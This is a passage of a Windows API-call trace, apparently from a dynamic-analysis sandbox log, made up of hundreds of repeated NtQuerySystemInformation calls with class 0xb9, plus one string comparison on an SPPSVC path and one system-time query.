ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc48, Length=0x50, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0274.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda10, Length=0x28, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0274.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0274.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x20, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd970, Length=0x20, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd970, Length=0x20, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd970, Length=0x20, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x38, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x20, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0274.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x50, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0274.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0274.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0274.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0274.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x38, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.205] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad8, Length=0x50, ResultLength=0x0) [0274.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0274.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x28, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0274.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0274.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0274.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfdc70 | out: lpSystemTimeAsFileTime=0xc751dfdc70*(dwLowDateTime=0x4b8a9be, dwHighDateTime=0x1d5fb6f)) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0274.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0274.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0274.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd600, Length=0x28, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0274.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0274.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x20, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd570, Length=0x20, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd570, Length=0x20, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 